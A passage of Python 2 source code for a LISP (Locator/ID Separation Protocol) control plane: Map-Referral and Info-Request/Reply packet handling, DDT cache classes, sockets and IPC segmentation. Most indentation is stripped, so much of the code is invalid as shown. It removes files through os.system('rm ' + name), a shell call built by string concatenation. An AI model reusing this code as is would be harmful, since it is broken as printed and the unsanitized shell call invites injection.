# |Type=6 | Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Referral Count| EID mask-len | ACT |A|I| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c |SigCnt | Map Version Number | EID-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-prefix ... |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |R| Loc/LCAF-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator ... |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_referral():
def __init__(self):
self.record_count = 0
self.nonce = 0
#enddef
def print_map_referral(self):
lprint("{} -> record-count: {}, nonce: 0x{}".format( \
bold("Map-Referral", False), self.record_count,
lisp_hex_string(self.nonce)))
#enddef
def encode(self):
first_long = (LISP_MAP_REFERRAL << 28) | self.record_count
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.record_count = first_long & 0xff
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
return(packet)
#enddef
#endclass
#
# This is a DDT cache type data structure that holds information configured
# in the "lisp ddt-authoritative-prefix" and "lisp delegate" commands. The
# self.delegation_set[] is a list of lisp_ddt_node()s.
#
class lisp_ddt_entry():
def __init__(self):
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.uptime = lisp_get_timestamp()
self.delegation_set = []
self.source_cache = None
self.map_referrals_sent = 0
#enddef
def is_auth_prefix(self):
if (len(self.delegation_set) != 0): return(False)
if (self.is_star_g()): return(False)
return(True)
#enddef
def is_ms_peer_entry(self):
if (len(self.delegation_set) == 0): return(False)
return(self.delegation_set[0].is_ms_peer())
#enddef
def print_referral_type(self):
if (len(self.delegation_set) == 0): return("unknown")
ddt_node = self.delegation_set[0]
return(ddt_node.print_node_type())
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_ddt_cache.add_cache(self.eid, self)
else:
ddt = lisp_ddt_cache.lookup_cache(self.group, True)
if (ddt == None):
ddt = lisp_ddt_entry()
ddt.eid.copy_address(self.group)
ddt.group.copy_address(self.group)
lisp_ddt_cache.add_cache(self.group, ddt)
#endif
if (self.eid.is_null()): self.eid.make_default_route(ddt.group)
ddt.add_source_entry(self)
#endif
#enddef
def add_source_entry(self, source_ddt):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_ddt.eid, source_ddt)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def is_star_g(self):
if (self.group.is_null()): return(False)
return(self.eid.is_exact_match(self.group))
#enddef
#endclass
class lisp_ddt_node():
def __init__(self):
self.delegate_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.public_key = ""
self.map_server_peer = False
self.map_server_child = False
self.priority = 0
self.weight = 0
#enddef
def print_node_type(self):
if (self.is_ddt_child()): return("ddt-child")
if (self.is_ms_child()): return("map-server-child")
if (self.is_ms_peer()): return("map-server-peer")
#enddef
def is_ddt_child(self):
if (self.map_server_child): return(False)
if (self.map_server_peer): return(False)
return(True)
#enddef
def is_ms_child(self):
return(self.map_server_child)
#enddef
def is_ms_peer(self):
return(self.map_server_peer)
#enddef
#endclass
#
# This is a Map-Request queue used on a Map-Resolver when waiting for a
# Map-Referral to be returned by a DDT-node or a Map-Server.
#
class lisp_ddt_map_request():
def __init__(self, lisp_sockets, packet, eid, group, nonce):
self.uptime = lisp_get_timestamp()
self.lisp_sockets = lisp_sockets
self.packet = packet
self.eid = eid
self.group = group
self.nonce = nonce
self.mr_source = None
self.sport = 0
self.itr = None
self.retry_count = 0
self.send_count = 0
self.retransmit_timer = None
self.last_request_sent_to = None
self.from_pitr = False
self.tried_root = False
self.last_cached_prefix = [None, None]
#enddef
def print_ddt_map_request(self):
lprint("Queued Map-Request from {}ITR {}->{}, nonce 0x{}".format( \
"P" if self.from_pitr else "",
red(self.itr.print_address(), False),
            green(self.eid.print_address(), False),
            lisp_hex_string(self.nonce)))
#enddef
def queue_map_request(self):
self.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
lisp_retransmit_ddt_map_request, [self])
self.retransmit_timer.start()
lisp_ddt_map_requestQ[str(self.nonce)] = self
#enddef
def dequeue_map_request(self):
self.retransmit_timer.cancel()
if (lisp_ddt_map_requestQ.has_key(str(self.nonce))):
lisp_ddt_map_requestQ.pop(str(self.nonce))
#endif
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
#endclass
#
# -------------------------------------------------------------------
# Type (Action field) Incomplete Referral-set TTL values
# -------------------------------------------------------------------
# 0 NODE-REFERRAL NO YES 1440
#
# 1 MS-REFERRAL NO YES 1440
#
# 2 MS-ACK * * 1440
#
# 3 MS-NOT-REGISTERED * * 1
#
# 4 DELEGATION-HOLE NO NO 15
#
# 5 NOT-AUTHORITATIVE YES NO 0
# -------------------------------------------------------------------
#
LISP_DDT_ACTION_SITE_NOT_FOUND = -2
LISP_DDT_ACTION_NULL = -1
LISP_DDT_ACTION_NODE_REFERRAL = 0
LISP_DDT_ACTION_MS_REFERRAL = 1
LISP_DDT_ACTION_MS_ACK = 2
LISP_DDT_ACTION_MS_NOT_REG = 3
LISP_DDT_ACTION_DELEGATION_HOLE = 4
LISP_DDT_ACTION_NOT_AUTH = 5
LISP_DDT_ACTION_MAX = LISP_DDT_ACTION_NOT_AUTH
lisp_map_referral_action_string = [
"node-referral", "ms-referral", "ms-ack", "ms-not-registered",
"delegation-hole", "not-authoritative"]
#
# Info-Request/Reply
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=7 |R| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | EID mask-len | EID-prefix-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-prefix |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Info-Request specific information following the EID-prefix:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 0 | <Nothing Follows AFI=0> |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Info-Reply specific information following the EID-prefix:
#
# +->+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = 16387 | Rsvd1 | Flags |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Type = 7 | Rsvd2 | 4 + n |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# N | MS UDP Port Number | ETR UDP Port Number |
# A +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# T | AFI = x | Global ETR RLOC Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# L | AFI = x | MS RLOC Address ... |
# C +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# A | AFI = x | Private ETR RLOC Address ... |
# F +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = x | RTR RLOC Address 1 ... |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = x | RTR RLOC Address n ... |
# +->+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# This encoding does not use authentication, so we respond to anyone who
# sends an Info-Request. And the EID-prefix will have AFI=0.
#
class lisp_info():
def __init__(self):
self.info_reply = False
self.nonce = 0
self.private_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.global_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.global_ms_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.ms_port = 0
self.etr_port = 0
self.rtr_list = []
self.hostname = lisp_hostname
#enddef
def print_info(self):
if (self.info_reply):
req_or_reply = "Info-Reply"
rloc = (", ms-port: {}, etr-port: {}, global-rloc: {}, " + \
"ms-rloc: {}, private-rloc: {}, RTR-list: ").format( \
self.ms_port, self.etr_port,
red(self.global_etr_rloc.print_address_no_iid(), False),
red(self.global_ms_rloc.print_address_no_iid(), False),
red(self.private_etr_rloc.print_address_no_iid(), False))
if (len(self.rtr_list) == 0): rloc += "empty, "
for rtr in self.rtr_list:
rloc += red(rtr.print_address_no_iid(), False) + ", "
#endfor
rloc = rloc[0:-2]
else:
req_or_reply = "Info-Request"
hostname = "<none>" if self.hostname == None else self.hostname
rloc = ", hostname: {}".format(blue(hostname, False))
#endif
lprint("{} -> nonce: 0x{}{}".format(bold(req_or_reply, False),
lisp_hex_string(self.nonce), rloc))
#enddef
def encode(self):
first_long = (LISP_NAT_INFO << 28)
if (self.info_reply): first_long |= (1 << 27)
#
# Encode first-long, nonce, key-id longword, TTL and EID mask-len/
# EID-prefix AFI. There is no auth data field since auth len is 0.
#
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
packet += struct.pack("III", 0, 0, 0)
#
# Add hostname as a null-terminated string with AFI 17 (distinguished-name).
#
if (self.info_reply == False):
if (self.hostname == None):
packet += struct.pack("H", 0)
else:
packet += struct.pack("H", socket.htons(LISP_AFI_NAME))
packet += self.hostname + "\0"
#endif
return(packet)
#endif
#
# If Info-Reply, encode Type 7 LCAF.
#
afi = socket.htons(LISP_AFI_LCAF)
lcaf_type = LISP_LCAF_NAT_TYPE
lcaf_len = socket.htons(16)
ms_port = socket.htons(self.ms_port)
etr_port = socket.htons(self.etr_port)
packet += struct.pack("HHBBHHHH", afi, 0, lcaf_type, 0, lcaf_len,
ms_port, etr_port, socket.htons(self.global_etr_rloc.afi))
packet += self.global_etr_rloc.pack_address()
packet += struct.pack("HH", 0, socket.htons(self.private_etr_rloc.afi))
packet += self.private_etr_rloc.pack_address()
if (len(self.rtr_list) == 0): packet += struct.pack("H", 0)
#
# Encode RTR list.
#
for rtr in self.rtr_list:
packet += struct.pack("H", socket.htons(rtr.afi))
packet += rtr.pack_address()
#endfor
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long)
self.nonce = nonce[0]
self.info_reply = first_long & 0x08000000
self.hostname = None
packet = packet[format_size::]
#
# Parse key-id, auth-len, auth-data, and EID-record. We don't support
# any of these. On encode, we set 3 longs worth of 0.
#
packet_format = "HH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
#
# If an LCAF value appears in the key-id field, then this is an
# old style Echo-Reply (that NX-OS implemented).
#
key_id, auth_len = struct.unpack(packet_format, packet[:format_size])
if (auth_len != 0): return(None)
packet = packet[format_size::]
packet_format = "IBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
ttl, rsvd, ml, eid_afi = struct.unpack(packet_format,
packet[:format_size])
if (eid_afi != 0): return(None)
packet = packet[format_size::]
#
# Check if name supplied.
#
if (self.info_reply == False):
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) >= format_size):
afi = struct.unpack(packet_format, packet[:format_size])[0]
if (socket.ntohs(afi) == LISP_AFI_NAME):
packet = packet[format_size::]
packet, self.hostname = lisp_decode_dist_name(packet)
#endif
#endif
return(orig_packet)
#endif
#
# Process Info-Reply.
#
packet_format = "HHBBHHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, x, lcaf_type, rsvd, lcaf_len, ms_port, etr_port = \
struct.unpack(packet_format, packet[:format_size])
if (socket.ntohs(afi) != LISP_AFI_LCAF): return(None)
self.ms_port = socket.ntohs(ms_port)
self.etr_port = socket.ntohs(etr_port)
packet = packet[format_size::]
#
# Get addresses one AFI at a time.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
#
# Get global ETR RLOC address.
#
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.global_etr_rloc.afi = socket.ntohs(afi)
packet = self.global_etr_rloc.unpack_address(packet)
if (packet == None): return(None)
self.global_etr_rloc.mask_len = \
self.global_etr_rloc.host_mask_len()
#endif
#
# Get global MS RLOC address.
#
if (len(packet) < format_size): return(orig_packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.global_ms_rloc.afi = socket.ntohs(afi)
packet = self.global_ms_rloc.unpack_address(packet)
if (packet == None): return(orig_packet)
self.global_ms_rloc.mask_len = self.global_ms_rloc.host_mask_len()
#endif
#
# Get private ETR RLOC address.
#
if (len(packet) < format_size): return(orig_packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.private_etr_rloc.afi = socket.ntohs(afi)
packet = self.private_etr_rloc.unpack_address(packet)
if (packet == None): return(orig_packet)
self.private_etr_rloc.mask_len = \
self.private_etr_rloc.host_mask_len()
#endif
#
# Get RTR list if any.
#
while (len(packet) >= format_size):
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi == 0): continue
rtr = lisp_address(socket.ntohs(afi), "", 0, 0)
packet = rtr.unpack_address(packet)
if (packet == None): return(orig_packet)
rtr.mask_len = rtr.host_mask_len()
self.rtr_list.append(rtr)
#endwhile
return(orig_packet)
#enddef
#endclass
class lisp_nat_info():
def __init__(self, addr_str, hostname, port):
self.address = addr_str
self.hostname = hostname
self.port = port
self.uptime = lisp_get_timestamp()
#enddef
def timed_out(self):
elapsed = time.time() - self.uptime
return(elapsed >= (LISP_INFO_INTERVAL * 2))
#enddef
#endclass
class lisp_info_source():
def __init__(self, hostname, addr_str, port):
self.address = lisp_address(LISP_AFI_IPV4, addr_str, 32, 0)
self.port = port
self.uptime = lisp_get_timestamp()
self.nonce = None
self.hostname = hostname
self.no_timeout = False
#enddef
def cache_address_for_info_source(self):
key = self.address.print_address_no_iid() + self.hostname
lisp_info_sources_by_address[key] = self
#enddef
def cache_nonce_for_info_source(self, nonce):
self.nonce = nonce
lisp_info_sources_by_nonce[nonce] = self
#enddef
#endclass
#------------------------------------------------------------------------------
#
# lisp_concat_auth_data
#
# Take each longword of authentication data, byte-swap it on little-endian
# (x86) hosts, and convert it to an ASCII hex string, zero-filling any
# longword that leads with 0.
#
def lisp_concat_auth_data(alg_id, auth1, auth2, auth3, auth4):
if (lisp_is_x86()):
if (auth1 != ""): auth1 = byte_swap_64(auth1)
if (auth2 != ""): auth2 = byte_swap_64(auth2)
if (auth3 != ""):
if (alg_id == LISP_SHA_1_96_ALG_ID): auth3 = socket.ntohl(auth3)
else: auth3 = byte_swap_64(auth3)
#endif
if (auth4 != ""): auth4 = byte_swap_64(auth4)
#endif
if (alg_id == LISP_SHA_1_96_ALG_ID):
auth1 = lisp_hex_string(auth1)
auth1 = auth1.zfill(16)
auth2 = lisp_hex_string(auth2)
auth2 = auth2.zfill(16)
auth3 = lisp_hex_string(auth3)
auth3 = auth3.zfill(8)
auth_data = auth1 + auth2 + auth3
#endif
if (alg_id == LISP_SHA_256_128_ALG_ID):
auth1 = lisp_hex_string(auth1)
auth1 = auth1.zfill(16)
auth2 = lisp_hex_string(auth2)
auth2 = auth2.zfill(16)
auth3 = lisp_hex_string(auth3)
auth3 = auth3.zfill(16)
auth4 = lisp_hex_string(auth4)
auth4 = auth4.zfill(16)
auth_data = auth1 + auth2 + auth3 + auth4
#endif
return(auth_data)
#enddef
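#
# Example usage (illustrative): for SHA1-96 the authentication data is three
# unpacked longwords (two 64-bit, one 32-bit) that concatenate to a
# 40-hex-character string; auth4 is unused and passed as "":
#
#   auth_data = lisp_concat_auth_data(LISP_SHA_1_96_ALG_ID, auth1, auth2,
#       auth3, "")
#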
#
# lisp_open_listen_socket
#
# Open either internal socket or network socket. If network socket, it will
# open it with a local address of 0::0 which means the one socket can be
# used for IPv4 or IPv6. This is goodness and reduces the number of threads
# required.
#
def lisp_open_listen_socket(local_addr, port):
if (port.isdigit()):
if (local_addr.find(".") != -1):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#endif
if (local_addr.find(":") != -1):
if (lisp_is_raspbian()): return(None)
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
#endif
sock.bind((local_addr, int(port)))
else:
name = port
if (os.path.exists(name)):
os.system("rm " + name)
time.sleep(1)
#endif
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.bind(name)
#endif
return(sock)
#enddef
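#
# Example usage (illustrative; the socket names here are made up): a numeric
# port string opens a network listen socket, while a non-numeric "port" is
# treated as an AF_UNIX pathname:
#
#   netsock = lisp_open_listen_socket("0.0.0.0", "4342")
#   ipcsock = lisp_open_listen_socket("", "lisp-example-ipc")
#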
#
# lisp_open_send_socket
#
# Open socket for sending to port 4342.
#
def lisp_open_send_socket(internal_name, afi):
if (internal_name == ""):
if (afi == LISP_AFI_IPV4):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#endif
if (afi == LISP_AFI_IPV6):
if (lisp_is_raspbian()): return(None)
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
#endif
else:
if (os.path.exists(internal_name)): os.system("rm " + internal_name)
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.bind(internal_name)
#endif
return(sock)
#enddef
#
# lisp_close_socket
#
# Close network and internal sockets.
#
def lisp_close_socket(sock, internal_name):
sock.close()
if (os.path.exists(internal_name)): os.system("rm " + internal_name)
return
#enddef
#
# lisp_is_running
#
# Test if one of "lisp-itr", "lisp-etr", "lisp-mr", "lisp-ms", "lisp-ddt", or
# "lisp-core" is running.
#
def lisp_is_running(node):
return(True if (os.path.exists(node)) else False)
#enddef
#
# lisp_packet_ipc
#
# Build IPC message for a LISP control packet destined for UDP port 4342. This
# packet goes to the lisp-core process and then it IPCs it to the appropriate
# LISP component process.
#
def lisp_packet_ipc(packet, source, sport):
return(("packet@" + str(len(packet)) + "@" + source + "@" + str(sport) + \
"@" + packet))
#enddef
#
# lisp_control_packet_ipc
#
# Build IPC message for a packet that needs to be sourced from UDP port 4342.
# Always sent by a LISP component process to the lisp-core process.
#
def lisp_control_packet_ipc(packet, source, dest, dport):
return("control-packet@" + dest + "@" + str(dport) + "@" + packet)
#enddef
#
# lisp_data_packet_ipc
#
# Build IPC message for a MAC, IPv4, or IPv6 data packet.
#
def lisp_data_packet_ipc(packet, source):
return("data-packet@" + str(len(packet)) + "@" + source + "@@" + packet)
#enddef
#
# lisp_command_ipc
#
# Build IPC message for a command message. Note this command IPC message must
# have same number of parameters as the "packet@" IPC. So an intentional
# double @ is put in after the source to indicate a null port.
#
def lisp_command_ipc(packet, source):
return("command@" + str(len(packet)) + "@" + source + "@@" + packet)
#enddef
#
# lisp_api_ipc
#
# Build IPC message for an API message. Note this API IPC message must
# have same number of parameters as the "packet@" IPC. So an intentional
# double @ is put in after the source to indicate a null port.
#
def lisp_api_ipc(source, data):
return("api@" + str(len(data)) + "@" + source + "@@" + data)
#enddef
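
#
# Illustrative sketch (not called anywhere): the "packet@", "data-packet@",
# "command@", and "api@" IPCs above all share a 5-field framing of
# "type@length@source@port@payload", where the port field is empty for
# non-packet messages. The payload itself may contain "@", so the split
# must be bounded.
#
def example_parse_ipc(message):
    msg_type, length, source, port, payload = message.split("@", 4)
    return([msg_type, length, source, port, payload])
#enddef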
#
# lisp_ipc
#
# Send IPC message to internal AF_UNIX socket if LISP component is running. We
# need to send in segments since the socket interface will not accept larger
# datagrams, and socket.setsockopt() won't allow us to increase SO_SNDBUF.
#
def lisp_ipc(packet, send_socket, node):
#
# Can't send an IPC message to a process that is not running.
#
if (lisp_is_running(node) == False):
lprint("Suppress sending IPC to {}".format(node))
return
#endif
ipc_len = 1500 if (packet.find("control-packet") == -1) else 9000
offset = 0
length = len(packet)
retry_count = 0
sleep_time = .001
while (length > 0):
segment_len = min(length, ipc_len)
segment = packet[offset:segment_len+offset]
try:
send_socket.sendto(segment, node)
lprint("Send IPC {}-out-of-{} byte to {} succeeded".format( \
len(segment), len(packet), node))
retry_count = 0
sleep_time = .001
except socket.error, e:
if (retry_count == 12):
lprint("Giving up on {}, consider it down".format(node))
break
#endif
lprint("Send IPC {}-out-of-{} byte to {} failed: {}".format( \
len(segment), len(packet), node, e))
retry_count += 1
time.sleep(sleep_time)
lprint("Retrying after {} ms ...".format(sleep_time * 1000))
sleep_time *= 2
continue
#endtry
offset += segment_len
length -= segment_len
#endwhile
return
#enddef
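#
# A worked example of the segmentation above (an editor's sketch): a
# 3500-byte "command@..." message is not a "control-packet@" message, so
# ipc_len is 1500 and sendto() is called three times, with 1500-, 1500-,
# and 500-byte segments. A 3500-byte "control-packet@..." message is under
# the 9000-byte limit and goes out in one sendto() call.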
#
# lisp_format_packet
#
# Put a whitespace between every 4 bytes of a packet dump.
#
def lisp_format_packet(packet):
packet = binascii.hexlify(packet)
offset = 0
new = ""
length = len(packet) * 2
while (offset < length):
new += packet[offset:offset+8] + " "
offset += 8
length -= 4
    #endwhile
return(new)
#enddef
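#
# For example (an editor's sketch), an 8-byte packet prints as two
# 8-hex-digit (4-byte) groups:
#
#   lisp_format_packet("\x45\x00\x00\x20\xab\xcd\xef\x01")
#     -> "45000020 abcdef01 " (plus trailing padding spaces)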
#
# lisp_send
#
# Send packet out.
#
def lisp_send(lisp_sockets, dest, port, packet):
lisp_socket = lisp_sockets[0] if dest.is_ipv4() else lisp_sockets[1]
#
# Remove square brackets. Use an IPv4 socket when address is IPv4, even
# when embedded in ::ffff:<ipv4-address>. This is a special case when
# an RTR sits behind a NAT and is sending a Map-Request. The ECM and
# Map-Request need to use the same ephemeral port and the Map-Reply
# needs to come to the ephemeral listening socket lisp_sockets[0];
#
# Also, on getchip and raspberry-pi OSes, there is no support for IPv6
# sockets, so we need to use the IPv4 embedded address and the IPv4
# socket.
#
address = dest.print_address_no_iid()
if (address.find("::ffff:") != -1 and address.count(".") == 3):
if (lisp_i_am_rtr): lisp_socket = lisp_sockets[0]
if (lisp_socket == None):
lisp_socket = lisp_sockets[0]
address = address.split("::ffff:")[-1]
#endif
#endif
lprint("{} {} bytes {} {}, packet: {}".format(bold("Send", False),
len(packet), bold("to " + address, False), port,
lisp_format_packet(packet)))
#
    # If Map-Request/Reply is an RLOC-probe, set TTL for outgoing packet to 255.
#
set_ttl = (LISP_RLOC_PROBE_TTL == 255)
if (set_ttl):
lisp_type = struct.unpack("B", packet[0])[0]
set_ttl = (lisp_type in [0x12, 0x28])
if (set_ttl): lisp_set_ttl(lisp_socket, LISP_RLOC_PROBE_TTL)
#endif
try: lisp_socket.sendto(packet, (address, port))
except socket.error, e:
lprint("socket.sendto() failed: {}".format(e))
#endtry
#
# Set back to default TTL.
#
if (set_ttl): lisp_set_ttl(lisp_socket, 64)
return
#enddef
#
# lisp_receive_segments
#
# Process 1500-byte segments if the received IPC packet is greater than what
# the socket interface can support.
#
def lisp_receive_segments(lisp_socket, packet, source, total_length):
#
    # If the total length is equal to the segment length, we only have one
    # segment, which is the entire packet. Return it.
#
segment_len = total_length - len(packet)
if (segment_len == 0): return([True, packet])
lprint("Received {}-out-of-{} byte segment from {}".format(len(packet),
total_length, source))
#
# Otherwise, receive each segment and assemble it to return entire packet
# to caller.
#
length = segment_len
while (length > 0):
try: segment = lisp_socket.recvfrom(9000)
except: return([False, None])
segment = segment[0]
#
        # The sender gave up and sent a new message that made it to us; the
        # last partial packet must be dropped.
#
if (segment.find("packet@") == 0):
seg = segment.split("@")
lprint("Received new message ({}-out-of-{}) while receiving " + \
"fragments, old message discarded", len(segment),
seg[1] if len(seg) > 2 else "?")
return([False, segment])
#endif
length -= len(segment)
packet += segment
lprint("Received {}-out-of-{} byte segment from {}".format( \
len(segment), total_length, source))
#endwhile
return([True, packet])
#enddef
#
# lisp_bit_stuff
#
# For every element in the array, insert a 0x40 ("@"). This is a bit-stuffing
# procedure. Only look at array elements with index 2 and above.
#
def lisp_bit_stuff(payload):
lprint("Bit-stuffing, found {} segments".format(len(payload)))
packet = ""
for segment in payload: packet += segment + "\x40"
return(packet[:-1])
#enddef
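#
# Since 0x40 is "@" in ascii, the effect is to rejoin segments that split()
# tore apart. For example (an editor's sketch):
#
#   lisp_bit_stuff(["a", "b"]) -> "a@b"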
#
# lisp_receive
#
# Wait for packet to come in. This function call will block. For command
# IPCs, we need to loop to assemble all segments.
#
# For an internal socket, the format of a recvfrom() 'packet-data' is:
#
# "command" @ <total-length> @ <source> @ <packet-buffer>
# "packet" @ <total-length> @ <source> @ <command-buffer>
#
# So when the split does not yield an array of at least length 4, we are
# receiving a fragment.
#
# For an external network socket, the format of a recvfrom() is:
#
# packet_data[0] = <packet-buffer>
# packet_data[1] = [<source>, <port>]
#
def lisp_receive(lisp_socket, internal):
while (True):
#
# Read from socket. Return if we received an error.
#
try: packet_data = lisp_socket.recvfrom(9000)
except: return(["", "", "", ""])
#
# This is a packet received on the network. If it was fragmented at the
        # sender, then IP did it, so it is assembled into a complete datagram
        # in this system.
#
if (internal == False):
packet = packet_data[0]
source = lisp_convert_6to4(packet_data[1][0])
port = packet_data[1][1]
if (port == LISP_DATA_PORT):
do_log = lisp_data_plane_logging
packet_str = lisp_format_packet(packet[0:60]) + " ..."
else:
do_log = True
packet_str = lisp_format_packet(packet)
#endif
if (do_log):
lprint("{} {} bytes {} {}, packet: {}".format(bold("Receive",
False), len(packet), bold("from " + source, False), port,
packet_str))
#endif
return(["packet", source, port, packet])
#endif
#
# This is an IPC message that can be fragmented by lisp-core or the
# sending socket interface.
#
assembled = False
data = packet_data[0]
loop = False
while (assembled == False):
data = data.split("@")
if (len(data) < 4):
lprint("Possible fragment (length {}), from old message, " + \
"discarding", len(data[0]))
loop = True
break
#endif
opcode = data[0]
try:
total_length = int(data[1])
except:
error_str = bold("Internal packet reassembly error", False)
lprint("{}: {}".format(error_str, packet_data))
loop = True
break
#endtry
source = data[2]
port = data[3]
#
# If any of the data payload has a 0x40 byte (which is "@" in
        # ascii), we will confuse the IPC separator with real data.
